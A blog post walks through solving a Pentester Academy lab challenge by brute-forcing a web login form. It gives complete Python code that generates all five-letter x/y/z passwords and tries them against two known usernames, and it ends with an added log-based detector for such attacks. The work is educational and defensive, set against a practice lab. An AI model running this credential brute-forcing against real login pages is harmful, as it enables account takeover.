Tuesday, 29 October 2013

securitytube (pentester academy) Challenge 1 Solution

Hello guys,

I'm gonna show you how I solved challenge 1 of the SecurityTube challenges by writing a simple Python script.

First, let's have a look at the challenge (URL below):


OK, it gives us some hints:



Hint:
  1. Company Domain: PentesterAcademy.com
  2. Usernames: jack, admin
  3. Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples - xxyyz, xyzxy, xyxxx etc.
OK, as shown in the hints, it gives us the password pattern and 2 usernames, so it looks like a brute force attack on a form :)

With a simple calculation: the password is built from three letters only (x, y and z) and is 5 characters long, so the number of possible passwords is 3 ^ 5 = 243. We have 2 usernames, so the number of tries against this form is 243 * 2 = 486.

OK, let's start coding our script to brute force this form:

I'm gonna use urllib2 to connect to the web page:

    #!/usr/bin/env python
    import urllib2
    response = urllib2.urlopen('http://pentesteracademylab.appspot.com//lab/webapp/auth/1/login')
    print response.info()
    # do something
    response.close()

This code gives us the following output:

    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache
    Vary: Accept-Encoding
    Date: Wed, 16 Oct 2013 14:59:24 GMT
    Server: Google Frontend
    Alternate-Protocol: 80:quic
    Connection: close

That's the header info, so the connection was made successfully.

Now we need to generate the 243 possible passwords:

    your_list = 'xyz'
    complete_list = []
    for current in xrange(5):
        # start with the single letters, then extend by one letter per pass
        a = [i for i in your_list]
        for y in xrange(current):
            a = [x+i for i in your_list for x in a]
        complete_list = complete_list+a

This code generates the combinations for every length from 1 to 5, so we need to slice the list and keep only the 5-character combinations. The shorter ones (3 + 9 + 27 + 81 = 120 entries) come first, so the 5-character ones sit at indexes 120 to 362.

    chunk = complete_list[120:363]
    print chunk
    print len(chunk)

The length printed for chunk will be 243. Cool :)

Now let's make a list for the users:

    username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']

OK, now we have a list of passwords and a list of usernames. We need to connect to the vulnerable app and try to log in with the generated passwords and the usernames.

We need a for loop over the passwords:

    for pw in chunk:

and another for loop over the usernames inside the first loop:

        for x in username:

Then we'll print every single try of username and password:

            trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"

As we know, the URL of the vulnerable app is

    http://pentesteracademylab.appspot.com/lab/webapp/1?email=username&password=password

so we replace the username parameter with the x variable and the password with the pw variable:

            url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)

That's good: our script will now send requests to the form and try each generated username and password, but we don't read the response yet! We need to know whether the username and password are right or wrong, so we'll put in these lines of code:

            request = urllib2.Request(url)
            response = urllib2.urlopen(request)
            back = response.read()[2486:2492]

Attention: for the line

            back = response.read()[2486:2492]

when you get the response, you need to pick out the part of it that tells you whether the password is right or wrong.

If you try

            back = response.read()
            print back
the output will be the whole page.

So we slice it from character 2486 to 2492, which is the word "Failed".
We'll check whether the output from the page is "Failed" or not on every try:

            print back
            if back != "Failed":
                cprint("Success With Username " +x+ "& Password " + pw ,'red')

And the challenge is successfully solved! :D

Here's the whole code:

    #!/usr/bin/env python
    '''
    Brute Force On Challenge 1
    Ahmed Sherif
    '''
    import urllib2
    import os
    from termcolor import cprint, colored

    # Build every combination of x, y, z with length 1 to 5
    your_list = 'xyz'
    complete_list = []
    for current in xrange(5):
        a = [i for i in your_list]
        for y in xrange(current):
            a = [x+i for i in your_list for x in a]
        complete_list = complete_list+a

    # Keep only the 243 five-character candidates
    chunk = complete_list[120:363]
    print chunk
    print len(chunk)

    f = open('myfile3.txt', 'w')  # log of every attempt and its result
    username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
    for pw in chunk:
        for x in username:
            trying = "Trying with Username \t"+ x +"\t password "+pw + "\n"
            print trying
            url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
            request = urllib2.Request(url)
            response = urllib2.urlopen(request)
            # characters 2486 to 2492 of the page hold the word "Failed" on a bad login
            back = response.read()[2486:2492]
            print back
            f.write(trying + back + "\n")
            if back != "Failed":
                cprint("Success With Username " +x+ "& Password " + pw ,'red')

    f.close()
or you can download it from here
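
Seen from the defending side, the 486 requests this script sends are easy to recognise in a web server's access log. The detector below is an added example and not part of the original post: the log format, the thresholds, the sample lines and the function names (`parse`, `detect`, `sample_log`) are assumptions; only the login path and the two e-mail addresses come from the post.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qs

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" \d{3}')
LOGIN_PATH = "/lab/webapp/1"           # path taken from the URL in the post
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"        # assumed access-log timestamp format

def parse(line):
    """Return (timestamp, ip, email) for a login request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, target = m.groups()
    url = urlsplit(target)
    qs = parse_qs(url.query)
    if url.path != LOGIN_PATH or "email" not in qs or "password" not in qs:
        return None
    return datetime.strptime(ts, TS_FMT), ip, qs["email"][0].lower()

def detect(lines, max_attempts=10, window=timedelta(seconds=60)):
    """Map each source IP that exceeds max_attempts login requests inside the
    sliding window to (peak request count, accounts targeted).
    Assumes the log lines are in chronological order."""
    recent, alerts = defaultdict(deque), {}
    for ts, ip, email in filter(None, map(parse, lines)):
        q = recent[ip]
        q.append((ts, email))
        while ts - q[0][0] > window:   # drop requests older than the window
            q.popleft()
        if len(q) > max_attempts:
            peak, accounts = alerts.get(ip, (0, set()))
            alerts[ip] = (max(peak, len(q)), accounts | {e for _, e in q})
    return alerts

def sample_log():
    """Constructed sample: one ordinary login, then 40 requests in 40 s
    alternating between the two accounts, the order the script above uses."""
    t0 = datetime(2013, 10, 16, 14, 59, 0, tzinfo=timezone.utc)
    fmt = '{} - - [{}] "GET /lab/webapp/1?email={}&password={} HTTP/1.1" 200 3100'
    users = ["jack@pentesteracademy.com", "admin@pentesteracademy.com"]
    lines = [fmt.format("198.51.100.7", t0.strftime(TS_FMT), users[0], "REDACTED")]
    for i in range(40):
        ts = (t0 + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(fmt.format("192.0.2.10", ts, users[i % 2], "REDACTED%d" % i))
    return lines

if __name__ == "__main__":
    for ip, (peak, accounts) in detect(sample_log()).items():
        print(ip, peak, sorted(accounts))
```

Because this form takes the credentials in the query string of a GET request, every tried password also lands in the access log, so those logs need the same protection as the credentials themselves.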